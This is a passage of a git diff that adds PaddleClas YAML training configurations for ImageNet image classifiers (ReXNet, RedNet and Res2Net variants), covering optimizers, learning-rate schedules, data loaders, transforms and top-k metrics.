DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + 
num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_5.yaml new file mode 100644 index 0000000..09a86cf --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_5.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_1_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + 
scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_2_0.yaml new file mode 100644 index 0000000..52336cd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_2_0.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model 
architecture +Arch: + name: ReXNet_2_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 
5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_3_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_3_0.yaml new file mode 100644 index 0000000..d1598fc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_3_0.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_3_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 
+ mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet101.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet101.yaml new file mode 100644 index 0000000..ca64ec8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet101.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet101 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + 
to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet152.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet152.yaml new file mode 100644 index 0000000..f44623c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet152.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: 
[3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet152 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + 
- TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet26.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet26.yaml new file mode 100644 index 0000000..c81395b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet26.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet26 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: 
[123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet38.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet38.yaml new file mode 100644 index 0000000..5f40ab3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet38.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet38 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: 
True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet50.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet50.yaml new file mode 100644 index 0000000..e4169ee --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet50.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 
224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: 
+ topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net101_vd_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net101_vd_26w_4s.yaml new file mode 100644 index 0000000..7e5cbfd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net101_vd_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net101_vd_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 
224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net200_vd_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net200_vd_26w_4s.yaml new file mode 100644 index 0000000..edceda1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net200_vd_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net200_vd_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - 
DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_14w_8s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_14w_8s.yaml new file mode 100644 index 0000000..1f3ecde --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_14w_8s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + 
